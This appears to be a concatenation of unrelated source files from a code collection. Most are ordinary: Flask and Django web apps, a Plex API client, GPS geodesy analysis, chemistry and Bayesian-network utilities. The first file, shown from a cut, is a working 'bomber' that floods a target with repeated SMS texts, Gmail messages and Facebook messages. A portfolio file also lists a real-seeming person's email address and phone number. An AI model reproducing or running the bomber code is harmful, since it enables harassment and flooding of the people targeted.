elif carrier == '6':
carrier = 'uscellular'
elif carrier == '7':
carrier = 'boost'
for x in range(ammount):
time.sleep(2)
GSMS.sms(username, password, number,carrier,texttosend)
print ('Sending text #', x + 1)
print (str(ammount)," Text sent to " ,number, " successfully")
if choice == '2':
mailserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)
mailserver.ehlo()
username = input('Enter Gmail Email Address: ')
password = getpass.getpass()
mailserver.login(username, password)
from_email = input('Enter From Email: ')
to_email = input('Enter Email Address To Bomb:')
subject = input('Enter Email Subject: ')
body = input('Enter Email Body: ')
ammount = int(input('How Many Emails to send?: '))
for i in range(ammount):
print('Sending email #' + str(i + 1))
time.sleep(2)
mailserver.sendmail(from_email, to_email,'Subject:' + subject + '\n' + body)
print(str(ammount),'Emails sent to', to_email, "successfully")
if choice == '3':
fb_email = input('Enter Facebook Email ')
fb_password = input('Enter Facebook Password ')
client = Client(fb_email, fb_password)
user_group = input('are you spamming user or group? ')
if user_group.lower() == 'user':
user_name = input('Name of user to spam ')
users = client.searchForUsers(user_name)
user = users[0]
thread_id = user.uid
message = input('What message to send ')
ammount = int(input('How many messages to send '))
for i in range(ammount):
print('sending message #', i + 1)
client.send(Message(text=message), thread_id=thread_id, thread_type=ThreadType.USER)
print(str(ammount), ' messages sent to ', user_name, ' successfully' )
if user_group.lower() == 'group':
thread_id = input('Enter thread id ex: https://www.facebook.com/messages/t/xxxxx ')
message = input('What message to send ')
ammount = int(input('How many messages to send '))
for i in range(ammount):
print('sending message #', i + 1)
client.send(Message(text=message), thread_id=thread_id, thread_type=ThreadType.GROUP)
print(str(ammount), ' messgaes sent to group successfully ')
|
996,624 | 898d3689c35a436292b27c69bbaa322b2bb46a61 | from flask import Blueprint
from flask import current_app as app
# Blueprint Configuration
home_bp = Blueprint(
'home_bp', __name__,
template_folder='templates',
static_folder='static'
) |
996,625 | 107d6c0bed3c2c803a8f7c0c9db32261b030dd2d | """
Some API handling code.
"""
import requests
import syndicate
import syndicate.data
from syndicate.adapters.sync import HeaderAuth
from syndicate.client import ResponseError
xmldecode = syndicate.data.serializers['xml'].decode
# CRAZY DEBUG XXX
def debug():
try:
import http.client as http_client
except ImportError:
# Python 2
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
# You must initialize logging, otherwise you'll not see debug output.
import logging
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
logger = logging.getLogger('websockets')
logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
#debug()
# /CRAZY DEBUG XXX
class AuthFailure(SystemExit):
pass
class PlexAuth(HeaderAuth):
""" Get the auth token by hitting the sign_in.xml endpoint. """
token_header = 'X-Plex-Token'
def __init__(self, api, params, signin):
self.api = api
self.params = params
headers = {"X-Plex-Client-Identifier": 'plexcli'}
if not params.get('auth_token'):
auth = params['username'], params['password']
else:
headers[self.token_header] = params.get('auth_token')
auth = None
super().__init__(headers)
if signin:
self.signin(auth)
def signin(self, auth):
signin = requests.post('%s/users/sign_in.xml' % self.api.uri,
auth=auth, headers=self.headers)
signin_xml = xmldecode(signin.content)
if signin.status_code != 201:
errors = [x.text for x in signin_xml.iter('error')]
raise AuthFailure('\n'.join(errors) or signin.text)
self.api.state['auth'] = auth = {
"token": signin_xml.attrib['authenticationToken'],
"username": signin_xml.attrib['username'],
"email": signin_xml.attrib['email']
}
self.headers[self.token_header] = auth['token']
class PlexService(syndicate.Service):
site = 'https://plex.tv'
def default_data_getter(self, response):
if response.error:
raise response.error
elif response.http_code not in (200, 201):
raise ResponseError(response)
else:
return response.content
def __init__(self, state):
self.state = state
super().__init__(uri='<reset_by_connect>', serializer='xml',
trailing_slash=False)
def multi_connect(self, *args, **kwargs):
""" Try connecting with a list of urls. If none work we abort but
return to our original state first. """
uri_save = self.uri
auth_save = self.adapter.auth
try:
self._multi_connect(*args, **kwargs)
except BaseException as e:
self.uri = uri_save
self.adapter.auth = auth_save
raise e
def _multi_connect(self, urls, verbose=False, **auth):
printer = print if verbose else lambda *_, **__: None
for x in urls:
printer("Trying connection to %s: " % x, end='', flush=True)
try:
self.connect(x, signin=False, **auth)
self.get(timeout=1) # Force connection attempt as test.
printer('SUCCESS')
break
except IOError:
printer('FAIL')
else:
raise IOError("ERROR: Could not connect to server(s)")
def connect(self, uri, signin=True, **auth_params):
self.uri = uri or self.site
self.authenticate(auth_params, signin)
def authenticate(self, params, signin):
auth = PlexAuth(self, params, signin)
self.adapter.auth = auth
def do(self, *args, **kwargs):
""" Wrap some session and error handling around all API actions. """
try:
return super().do(*args, **kwargs)
except ResponseError as e:
self.handle_error(e)
def handle_error(self, error):
""" Pretty print error messages and exit. """
html = error.response.content
raise SystemExit("API Error:\n %s" %
"\n ".join(html.itertext()))
|
996,626 | 96fb07f82627a2b93adcfdebce2126af1eaa0aa6 | import datetime
#from profile import profile
from flask import Flask, render_template, url_for
app = Flask(__name__)
@app.route('/')
def home_page():
year = datetime.datetime.now().year
return render_template('./index.html', year=year, profile=profile)
@app.route('/<username>/<int:post_id>')
def user_page(username, post_id):
return render_template('./index.html',
name=username,
post_id=post_id)
@app.route('/blog')
def blog_page():
return 'Welcome to my blog!'
profile = {
'firstName': 'Davis',
'lastname': 'Bickford',
'name': 'Davis Bickford',
'jobTitle': 'Software Engineer',
'aboutme': 'I am a software engineer passionate about solving complex challenges through technical experience, effective communication, collaboration, and a growth mindset.',
'linkedin': 'in/davisbickford/',
'linkedinURL': 'https://www.linkedin.com/in/davisbickford/',
'resumeURL': 'https://drive.google.com/open?id=1rIftYRApheSlJFM68FOvzGL_yvoqHN6B',
'email': 'davis.bickford@gmail.com',
'phone': '(303) 947-4291',
'projects': [
{
'title': 'PlayBound',
'image': 'playbound.png',
'description': "PlayBound is a video game currently in development. I am the sole developer and artist.",
'description2': "PlayBound tells the story of Kelvin, a boy whose parents have become fatally boring. Strap on your velcro light-up kicks and equip your POG slammers, because it's time to save the world from certain lameness!",
'techList': 'game development, c#, digital art, unity engine'.split(', '),
'website': 'http://steam.studiosploot.com/',
'codeURL': ''
},
{
'title': 'Pug or Not Pug',
'image': 'pug-or-not-pug.png',
'description': "Pug or Not Pug is a web application that will determine whether a pug is in a provided image.",
'description2': "",
'techList': 'react, machine learning, rest api, node.js, express.js, postgreSQL, sql, html, css, javascript'.split(', '),
'website': 'https://darnvisages.github.io/pug-or-not-pug/',
'codeURL': 'https://github.com/darnvisages/pug-or-not-pug'
},
{
'title': 'Parma',
'image': 'parma.png',
'description': "Parma is my favorite Italian restaurant, located in Superior, CO. I built their website using React.",
'description2': "The site features a searchable menu.",
'techList': 'react, html, css, javascript'.split(', '),
'website': 'http://www.parmamozzarellabar.com/',
'codeURL': ''
},
{
'title': 'Portfolio Website',
'image': 'portfoliosite.png',
'description': "You're looking at it right now! This portfolio site was built using Flask and Bootstrap.",
'description2': "",
'techList': 'python, flask, bootstrap, html, css, javascript'.split(', '),
'website': 'http://www.davisbickford.com/',
'codeURL': 'https://github.com/darnvisages/davisbickford-flask-portfolio'
}
# {
# 'title': '',
# 'image': '',
# 'description': "",
# 'description2': "",
# 'techList': ''.split(', '),
# 'website': '',
# 'codeURL': ''
# ,
]
}
profile['project_count'] = len(profile['projects'])
|
996,627 | 7faa7a5087132c3f06f4ad01fe94bc31f77e6725 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-07-10 08:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0003_auto_20180703_1830'),
]
operations = [
migrations.AddField(
model_name='userdetails',
name='location',
field=models.CharField(blank=True, max_length=250, null=True, verbose_name='Location'),
),
]
|
996,628 | b575505bea22bded6e7e9d47ed4d702eecf78b75 | # Python viewing to see the Mendocino stations
# Step 1: Determine the stations in the radius.
# Step 2: Read them in. Make a list of timeseries objects in one large dataobject.
# Step 3: Compute: Remove outliers and earthquakes. Then identify
# Step 4: Produce a table and plot of accelerations before/after time ranges.
# Reference:
# Timeseries = collections.namedtuple("Timeseries",['name','coords','dtarray','dN', 'dE','dU','Sn','Se','Su','EQtimes']); # in mm
# Feature: verticals and horizontals at the same time, making two output plots
# Feature: feed seasonal type as parameter, and include that in the output_file name
# This lets us run several experiments.
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
import glob
import subprocess, sys
import gps_io_functions
import gps_ts_functions
import gps_seasonal_removals
import gps_input_pipeline
import offsets
import stations_within_radius
from Tectonic_Utils.geodesy import haversine
import remove_ets_events
def driver(EQcoords, size, network, refframe, fit_type, deltat1, deltat2, expname, station_list=()):
[stations, outdir, time_after_start_date, critical_variance] = configure(EQcoords, fit_type, size, network,
refframe, station_list);
[dataobj_list, offsetobj_list, eqobj_list] = inputs(stations, network, refframe);
[noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj] = compute(dataobj_list, offsetobj_list, eqobj_list,
deltat1, deltat2, fit_type,
time_after_start_date, critical_variance);
outputs(noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj, outdir, expname, fit_type, network, refframe,
deltat1, deltat2, time_after_start_date, critical_variance);
return;
def configure(EQcoords, fit_type, overall_size, network, refframe, station_list=()):
outdir = network + "_" + fit_type + "_" + refframe;
subprocess.call('mkdir -p ' + outdir, shell=True);
if network == 'nldas' or network == 'gldas' or network == 'noah025' or network == 'lsdm':
network = 'pbo'; # This is just for finding which stations we will search for.
time_after_start_date = 7; # optionally, wait a while after the start day.
critical_variance = 5; # mm/yr. If the time series have a larger variance, we don't consider them
map_coords = [];
if overall_size == 'medium':
radius = 350; # km.
elif overall_size == 'huge':
radius = -1; # this is a special key for using a coordinate box instead of a radius
map_coords = [-125.6, -110.0, 32.5, 48.5];
else:
radius = 150;
if len(station_list) > 0:
stations = station_list;
else:
# Getting the stations of interest ('huge' means we just want within the box.)
if radius == -1:
stations, _, _ = stations_within_radius.get_stations_within_box(map_coords, network);
else:
stations, _, _, _ = stations_within_radius.get_stations_within_radius(EQcoords, radius, map_coords,
network);
stations = gps_input_pipeline.remove_blacklist(stations);
return [stations, outdir, time_after_start_date, critical_variance];
def inputs(station_names, network, refframe):
dataobj_list = [];
offsetobj_list = [];
eqobj_list = [];
for station_name in station_names:
[myData, offset_obj, eq_obj] = gps_input_pipeline.get_station_data(station_name, network, refframe);
if not myData:
continue;
else:
dataobj_list.append(myData);
offsetobj_list.append(offset_obj);
eqobj_list.append(eq_obj);
return [dataobj_list, offsetobj_list, eqobj_list];
def compute(dataobj_list, offsetobj_list, eqobj_list, deltat1, deltat2, fit_type, time_after_start_date,
critical_variance):
dt1_start = dt.datetime.strptime(deltat1[0], "%Y%m%d");
dt1_end = dt.datetime.strptime(deltat1[1], "%Y%m%d");
dt2_start = dt.datetime.strptime(deltat2[0], "%Y%m%d");
dt2_end = dt.datetime.strptime(deltat2[1], "%Y%m%d");
# No earthquakes objects
noeq_objects = [];
east_slope_obj = [];
north_slope_obj = [];
vert_slope_obj = [];
# For the vertical correction.
names = [];
coords = [];
for i in range(len(dataobj_list)):
names.append(dataobj_list[i].name);
coords.append(dataobj_list[i].coords);
# The main processing loop for slopes.
for i in range(len(dataobj_list)):
# Remove the earthquakes
print(names[i]);
newobj = offsets.remove_offsets(dataobj_list[i], offsetobj_list[i]);
newobj = offsets.remove_offsets(newobj, eqobj_list[i]);
if fit_type == 'none':
newobj = gps_seasonal_removals.make_detrended_ts(newobj, 0, fit_type); # remove seasonals
else:
if newobj.name == 'P349':
newobj = gps_seasonal_removals.make_detrended_ts(newobj, 1, 'shasta');
if newobj.name == 'ORVB':
newobj = gps_seasonal_removals.make_detrended_ts(newobj, 1, 'oroville');
if fit_type != 'none':
newobj = gps_seasonal_removals.make_detrended_ts(newobj, 1, fit_type); # remove seasonals
# NOTE: WRITTEN IN JUNE 2019
# An experiment for removing ETS events
# if newobj.name in ["P349","P060","P330","P331","P332","P343","P338","P341"]:
ets_intervals = remove_ets_events.input_tremor_days();
# newobj=gps_ts_functions.remove_outliers(newobj,3.0); # 3 mm outlier def.
# newobj=remove_ets_events.remove_ETS_times(newobj,ets_intervals, offset_num_days=15); # 30 days on either end of the offsets
newobj = remove_ets_events.remove_characteristic_ETS(newobj,
ets_intervals); # using only the characteristic offset
noeq_objects.append(newobj);
# Get the pre-event and post-event velocities (earthquakes removed)
[east_slope_before, north_slope_before, vert_slope_before, esig0, nsig0, usig0] = gps_ts_functions.get_slope(
newobj, starttime=dt1_start + dt.timedelta(days=time_after_start_date), endtime=dt1_end);
[east_slope_after, north_slope_after, vert_slope_after, esig1, nsig1, usig1] = gps_ts_functions.get_slope(
newobj, starttime=dt2_start + dt.timedelta(days=time_after_start_date), endtime=dt2_end);
# Get the uncertainties on the velocity-change estimate
[east_slope_unc1, north_slope_unc1, vert_slope_unc1] = gps_ts_functions.get_slope_unc(newobj,
dt1_start + dt.timedelta(
days=time_after_start_date),
dt1_end);
[east_slope_unc2, north_slope_unc2, vert_slope_unc2] = gps_ts_functions.get_slope_unc(newobj,
dt2_start + dt.timedelta(
days=time_after_start_date),
dt2_end);
east_dv_unc = gps_ts_functions.add_two_unc_quadrature(east_slope_unc1, east_slope_unc2);
north_dv_unc = gps_ts_functions.add_two_unc_quadrature(north_slope_unc1, north_slope_unc2);
vert_dv_unc = gps_ts_functions.add_two_unc_quadrature(vert_slope_unc1, vert_slope_unc2);
# When do we ignore stations? When their detrended time series have a large variance.
if abs(esig0) > critical_variance or abs(nsig0) > critical_variance or abs(esig1) > critical_variance or abs(
nsig1) > critical_variance:
print("Kicking station %s out..." % dataobj_list[i].name);
[east_slope_after, north_slope_after, vert_slope_after] = [np.nan, np.nan, np.nan];
[east_slope_before, north_slope_before, vert_slope_before] = [np.nan, np.nan, np.nan];
[east_slope_unc1, north_slope_unc1, vert_slope_unc1] = [np.nan, np.nan, np.nan];
[east_slope_unc2, north_slope_unc2, vert_slope_unc2] = [np.nan, np.nan, np.nan];
east_slope_obj.append([east_slope_before, east_slope_after, east_dv_unc]);
north_slope_obj.append([north_slope_before, north_slope_after, north_dv_unc]);
vert_slope_obj.append([vert_slope_before, vert_slope_after, vert_dv_unc]);
# Adjusting verticals by a reference station.
vert_slope_obj = vert_adjust_by_reference_stations(names, coords, vert_slope_obj);
return [noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj];
def vert_adjust_by_reference_stations(names, coords, slope_obj):
# How do we adjust the verticals for large-scale drought signatures?
reference_station = 'P208';
coord_box = [-123, -121, 39, 42];
eq_coords = [-124.81, 40.53];
radius = 250;
max_radius = 350;
reference_type = 'radius' # options = 'radius','box','station'
new_slope_obj = [];
background_slopes_before = [];
background_slopes_after = [];
for i in range(len(names)):
if reference_type == 'station':
if names[i] == reference_station:
background_slopes_before.append(slope_obj[i][0]);
background_slopes_after.append(slope_obj[i][1]);
elif reference_type == 'box':
if coord_box[0] < coords[i][0] < coord_box[1]:
if coord_box[2] < coords[i][1] < coord_box[3]:
background_slopes_before.append(slope_obj[i][0]);
background_slopes_after.append(slope_obj[i][1]);
elif reference_type == 'radius':
mydistance = haversine.distance([coords[i][1], coords[i][0]], [eq_coords[1], eq_coords[0]]);
if radius < mydistance < max_radius:
background_slopes_before.append(slope_obj[i][0]);
background_slopes_after.append(slope_obj[i][1]);
vert_reference_before = np.nanmean(background_slopes_before);
vert_reference_after = np.nanmean(background_slopes_after);
print("Vert slope before: %f " % vert_reference_before);
print("Vert slope after: %f " % vert_reference_after);
for i in range(len(slope_obj)):
new_slope_obj.append(
[slope_obj[i][0] - vert_reference_before, slope_obj[i][1] - vert_reference_after, slope_obj[i][2]]);
return new_slope_obj;
def outputs(noeq_objects, east_slope_obj, north_slope_obj, vert_slope_obj, outdir, expname, fit_type, network, refframe,
deltat1, deltat2, time_after_start_date, critical_variance):
basename = outdir + '/' + expname;
ofile1 = open(basename + '.txt', 'w');
ofile1.write("# %s network in %s refframe with %s seasonal removal\n" % (network, refframe, fit_type));
ofile1.write("# %d days gap after EQtime, %s mm/yr maximum variance\n" % (time_after_start_date, critical_variance))
ofile1.write("# %s minus %s velocities \n" % (deltat2, deltat1));
for i in range(len(noeq_objects)):
# Lon, Lat, East, North, 0, Vert, SigE, SigN, SigV, Corr, Name
ofile1.write("%.2f %.2f %.2f %.2f 0 %.2f %.2f %.2f %.2f 0 %s\n" % (
noeq_objects[i].coords[0], noeq_objects[i].coords[1], east_slope_obj[i][1] - east_slope_obj[i][0],
(north_slope_obj[i][1] - north_slope_obj[i][0]), vert_slope_obj[i][1] - vert_slope_obj[i][0],
east_slope_obj[i][2], north_slope_obj[i][2], vert_slope_obj[i][2], noeq_objects[i].name));
ofile1.close();
# Here we call the GMT master script, if we want.
subprocess.call("./master_plotting.sh " + outdir + "/ " + expname, shell=True);
return;
# ---------------------- #
# GRACE ONLY FUNCTIONS #
# Sometimes we want to see whether loading from GRACE is able to explain the
# data from Mendocino, etc.
def grace_driver(deltat1, deltat2, grace_dir, outfile_name, out_dir):
# For when you want to do the same calculations, for GRACE models
[file_list, dt1_start, dt1_end, dt2_start, dt2_end, basename] = grace_configure(deltat1, deltat2, grace_dir,
outfile_name);
[dataobj_list] = grace_inputs(file_list);
[east_slope_obj, north_slope_obj, vert_slope_obj] = grace_compute(dt1_start, dt1_end, dt2_start, dt2_end,
dataobj_list);
grace_outputs(dataobj_list, east_slope_obj, north_slope_obj, vert_slope_obj, out_dir, basename);
return;
def grace_configure(deltat1, deltat2, grace_dir, outfile_name):
basename = outfile_name;
dt1_start = dt.datetime.strptime(deltat1[0], "%Y%m%d");
dt1_end = dt.datetime.strptime(deltat1[1], "%Y%m%d");
dt2_start = dt.datetime.strptime(deltat2[0], "%Y%m%d");
dt2_end = dt.datetime.strptime(deltat2[1], "%Y%m%d");
# Getting the stations of interest
file_list = glob.glob(grace_dir + "/*.txt");
print("Reading %d files in %s " % (len(file_list), grace_dir));
return [file_list, dt1_start, dt1_end, dt2_start, dt2_end, basename];
def grace_inputs(file_list):
dataobj_list = [];
for item in file_list:
grace_ts = gps_io_functions.read_grace(item);
dataobj_list.append(grace_ts);
return [dataobj_list];
def grace_compute(dt1_start, dt1_end, dt2_start, dt2_end, dataobject_list):
east_slope_obj = [];
north_slope_obj = [];
vert_slope_obj = [];
period_after_start_date = 7; # wait a week.
for i in range(len(dataobject_list)):
# Just fit the best line.
# # Get the pre-event and post-event velocities
[east_slope_before, north_slope_before, vert_slope_before, esig0, nsig0, usig0] = gps_ts_functions.get_slope(
dataobject_list[i], starttime=dt1_start + dt.timedelta(days=period_after_start_date), endtime=dt1_end);
[east_slope_after, north_slope_after, vert_slope_after, esig1, nsig1, usig1] = gps_ts_functions.get_slope(
dataobject_list[i], starttime=dt2_start + dt.timedelta(days=period_after_start_date), endtime=dt2_end);
east_slope_obj.append([east_slope_before, east_slope_after]);
north_slope_obj.append([north_slope_before, north_slope_after]);
vert_slope_obj.append([vert_slope_before, vert_slope_after]);
# # Experiment: Remove the sinusoidal components. Result is identical.
# [east_params_before, north_params_before, vert_params_before] = grace_ts_functions.get_linear_annual_semiannual(dataobject_list[i], starttime=dt1_start+dt.timedelta(days=period_after_start_date),endtime=dt1_end);
# [east_params_after, north_params_after, vert_params_after]=grace_ts_functions.get_linear_annual_semiannual(dataobject_list[i],starttime=dt2_start+dt.timedelta(days=period_after_start_date),endtime=dt2_end);
# east_slope_obj.append([east_params_before[0], east_params_after[0]]);
# north_slope_obj.append([north_params_before[0], north_params_after[0]]);
# vert_slope_obj.append([vert_params_before[0], vert_params_after[0]]);
return [east_slope_obj, north_slope_obj, vert_slope_obj];
def grace_outputs(dataobj_list, east_slope_obj, north_slope_obj, vert_slope_obj, out_dir, basename):
ofile1 = open(out_dir + basename + '.txt', 'w');
for i in range(len(dataobj_list)):
ofile1.write("%f %f %f %f 0 %f 0 0 0 0 %s\n" % (
dataobj_list[i].coords[0], dataobj_list[i].coords[1], east_slope_obj[i][1] - east_slope_obj[i][0],
(north_slope_obj[i][1] - north_slope_obj[i][0]), vert_slope_obj[i][1] - vert_slope_obj[i][0],
dataobj_list[i].name));
ofile1.close();
# subprocess.call(['./accel_map_gps.gmt',basename+'.txt',str(map_coords[0]),str(map_coords[1]),str(map_coords[2]),str(map_coords[3]),basename],shell=False);
# print('./accel_map_gps.gmt '+str(map_coords[0])+' '+str(map_coords[1])+' '+str(map_coords[2])+' '+str(map_coords[3])+' '+basename);
return;
|
996,629 | d2a8fae8f451b4e16ee721bd70900ea4872d341a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
########################################################################
#
# Script to rotate a dihedral angle in a molecule
#
#########################################################################
import ff_gen.IOmod as IOmod
import molsys.stow as stow
import chemcoord as cc
import numpy
option = [
['', 'i', 'xyzfile'],
['', 'b', 'bond'], # IDs of the 4 atoms which define the dihedral angle. Format: "a0 a1 a2 a3" (with " or ' signs)
['0', 's', 'start_angle'],
['180', 'e', 'end_angle'],
['5', 'd', 'step']]
shellval = stow.main(stow.sys.argv[1:], option)
fname = shellval[0]
bond = shellval[1]
start = shellval[2]
end = shellval[3]
step = shellval[4]
bond_list = [int(i) for i in bond.split()]
start = float(start)
end = float(end)
step = float(step)
l = numpy.arange(start, end, step)
for i in l:
kaskel = IOmod.io()
kaskel.read_xyz(fname)
kaskel.rotate_dihedral(bond_list, i)
kaskel.write_xyz('%d%s' % (i, fname))
|
996,630 | 1ed67b19ff7a0f17feac3bea0b7a9e25a79a4c99 | from environment import World
from creature import Cell
from random import randint, choice
def main():
env = World(10, 10)
creatures = list()
env.replenish(20)
env.display()
num_creatures = 10
for i in range(0, num_creatures):
x, y = env.random_location()
creatures.append(Cell(x, y))
print(creatures[i])
total_rounds = 10
iterations = 0
for i in range(0, total_rounds):
creatures_can_move = True
while(creatures_can_move and iterations < 1000000):
for creature_i in range(0, len(creatures)):
creature = creatures[creature_i]
if creature.will_move():
possible_moves = {"left", "right", "up", "down"}
while(len(possible_moves) and not creature.satisfied):
direction = choice(tuple(possible_moves))
xpos, ypos = creature.pos_with_move(direction)
if env.valid_spot(xpos, ypos):
print(f'Moving: {creature_i} ({creature.moves_this_turn})')
creature.move(direction)
if env.board[creature.x][creature.y].total_nutrients() > 0:
creature.eat(env.board[creature.x][creature.y].consume().nutrients)
creature.satisfied = True # Conditions for satisfaction will change
break
possible_moves.remove(direction)
iterations += 1
# Continue this round if any creature can continue to move
creatures_can_move = False
for creature_i in range(0, len(creatures)):
creature = creatures[creature_i]
if creature.will_move():
# print(f'Creature: {creature_i} still wants to move after doing {creature.moves_this_turn} moves')
creatures_can_move = True
print("Round ended")
env.display()
for creature in creatures:
print(creature)
creature.return_home()
if __name__ == "__main__":
main()
|
996,631 | 446f10b33142cd84c1384efa89e899efbd0b9b13 | from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for
)
from werkzeug.exceptions import abort
from flaskr.auth import login_required
from flaskr.db import get_db
bp = Blueprint('blog', __name__)
@bp.route('/', methods=['GET', 'POST'])
def index():
db = get_db()
posts = db.execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' ORDER BY created DESC'
).fetchall()
""" Get likes total """
likes_list = []
comments_list = []
for post in posts:
likes = db.execute(
'SELECT id, post_id, is_like FROM likes WHERE post_id=? and is_like=1', (post['id'],)
).fetchall()
likes_list.append(len(likes))
comments = db.execute(
'SELECT id FROM comments WHERE post_id=?', (post['id'],)
).fetchall()
comments_list.append(len(comments))
data = {
'posts': posts,
'likes_list': likes_list,
'comments_list': comments_list,
}
return render_template('blog/index.html', posts=posts, data=data)
@bp.route('/create', methods=('GET', 'POST'))
@login_required
def create():
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flash(error)
else:
db = get_db()
db.execute(
'INSERT INTO post (title, body, author_id)'
' VALUES (?, ?, ?)',
(title, body, g.user['id'])
)
db.commit()
return redirect(url_for('blog.index'))
return render_template('blog/create.html')
@bp.route('/<int:id>/update', methods=('GET', 'POST'))
@login_required
def update(id):
post = get_post(id)
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flash(error)
else:
db = get_db()
db.execute(
'UPDATE post SET title = ?, body = ?'
' WHERE id = ?',
(title, body, id)
)
db.commit()
return redirect(url_for('blog.index'))
return render_template('blog/update.html', post=post)
@bp.route('/<int:id>/delete', methods=('POST',))
@login_required
def delete(id):
get_post(id)
db = get_db()
db.execute('DELETE FROM post WHERE id = ?', (id,))
db.commit()
return redirect(url_for('blog.index'))
@bp.route('/<int:id>/post', methods=('GET', 'POST'))
def post_detail(id):
post = get_post_detail(id)
db = get_db()
if request.method == 'POST':
visitor = request.form['name']
comment = request.form['comment']
error = None
if not visitor:
error = 'Your name is required.'
if not comment:
error = 'Comment is required.'
if error is not None:
flash(error)
db.execute(
'INSERT INTO comments (post_id, visitor, comment)'
' VALUES (?, ?, ?)',
(id, visitor, comment)
)
db.commit()
is_like = False
if g.user:
like_detail = get_likes_detail(post['id'], g.user['id'])
if like_detail:
is_like = like_detail['is_like']
else:
is_like = False
likes_count = get_likes_count(id)
""" Get comment if exists """
comments = db.execute(
'SELECT id, created, post_id, visitor, comment'
' FROM comments WHERE post_id = ?', (id,)
).fetchall()
comment_count = 0
if comments:
comment_count = len(comments)
data = {
'likes_count': likes_count,
'is_like': is_like,
'post': post,
'comments': comments,
'comment_count': comment_count,
}
return render_template('blog/post_detail.html', data=data)
@bp.route('/<int:post_id>/like')
@login_required
def like_this_post(post_id):
if g.user['id']:
is_like = True
like_detail = get_likes_detail(post_id, g.user['id'])
if not like_detail:
db = get_db()
db.execute(
'INSERT INTO likes (post_id, user_id, is_like)'
' VALUES (?, ?, ?)',
(post_id, g.user['id'], is_like)
)
db.commit()
else:
is_like = like_detail['is_like']
if not is_like:
is_like = True
else:
is_like = False
db = get_db()
db.execute(
'UPDATE likes SET is_like = ?'
' WHERE id = ?',
(is_like, like_detail['id'])
)
db.commit()
return redirect(url_for('blog.post_detail', id=post_id))
def get_post(id, check_author=True):
post = get_db().execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' WHERE p.id = ?',
(id,)
).fetchone()
if post is None:
abort(404, "Post id {0} doesn't exist.".format(id))
if check_author and post['author_id'] != g.user['id']:
abort(403)
return post
def get_post_detail(id):
post = get_db().execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' WHERE p.id = ?',
(id,)
).fetchone()
if post is None:
abort(404, "Post id {0} doesn't exist.".format(id))
return post
def get_likes_detail(post_id, user_id):
like_detail = get_db().execute(
'SELECT id, post_id, user_id, is_like FROM likes WHERE post_id = ? and user_id = ?',
(post_id, user_id)
).fetchone()
return like_detail
def get_likes_count(post_id):
likes_count = 0
likes = get_db().execute(
'SELECT id, is_like FROM likes WHERE post_id = ?', (post_id,)
)
for rec in likes:
if rec['is_like']:
likes_count += 1
return likes_count
|
996,632 | 49ca55fbdfc7fea819956c3510d49654bbb5078d | from parser import *
from matrix import *
screen = new_screen()
color = [0, 0, 0]
edges = []
transform = new_matrix()
parse_file('script2', edges, transform, screen, color)
|
996,633 | 53cb967d01fbaf4ff31ac55641fd7ebd5ed36f53 | from django.shortcuts import render
from django.http import HttpResponse
from appTwo.models import User
# Create your views here.
def index(request):
return render(request, 'appTwo/index.html', context={})
def users(request):
users_list = User.objects.order_by('first_name')
users_dict = {'users_info': users_list}
return render(request, 'appTwo/users.html', context=users_dict)
|
996,634 | cc24cf26e1006c4ea0b3381237a701b978fd8f12 | #!/usr/bin/env jython
import arthur.Data as Data
import arthur.EmUtil as Util
import arthur.EDML as EDML
import arthur.ExpectationMaximizationMap as EM
import arthur.ExpectationMaximizationMapAlt as EMALT
import il2.model.BayesianNetwork as BN
import il2.model.Domain as Domain
import il2.model.Table as Table
import il2.util.IntSet as IntSet
import java.util.Random as Random
def parent_set_iterator(ordering):
for ind in xrange(2**len(ordering)):
yield [ parent for i,parent in enumerate(ordering) if (ind/2**i)%2 ]
def structure_iterator(ordering):
if len(ordering) == 1:
var = ordering[0]
yield { var:[] }
else:
var = ordering[-1]
ordering_m1 = ordering[:-1]
for structure in structure_iterator(ordering_m1):
for parents in parent_set_iterator(ordering_m1):
structure[var] = parents
yield structure
# stolen from http://docs.python.org/library/itertools.html
def permutation_iterator(iterable, r=None):
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = range(n)
cycles = range(n, n-r, -1)
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def make_skeleton_bn(domain,ordering,families):
cpts = []
for var in ordering:
parents = families[var]
parents = [ domain.index(parent) for parent in parents ]
parents.sort()
cpt_vars = IntSet(parents + [domain.index(var)])
cpt = Table(domain,cpt_vars)
cpts.append(cpt)
return BN(cpts)
def size_of_bn(bn):
domain = bn.domain()
size = 0
for var,cpt in enumerate(bn.cpts()):
var_size = domain.size(var)
cpt_size = len(cpt.values())
cpt_size = (var_size-1)*(cpt_size/var_size)
size += cpt_size
return size
def random_network(bn,seed=0):
r = Random(seed)
return BN(Util.randomNetwork(bn,r))
def run_em(bn,data,counts=None,seed=None,iters=1024,eps=1e-4,psi=1,stats={}):
em = EM(bn,data,counts)
em.setEmParameters(iters,eps)
em.setPrior(psi)
if seed is None: seed = random_network(bn,0)
cpts = em.em(seed.cpts())
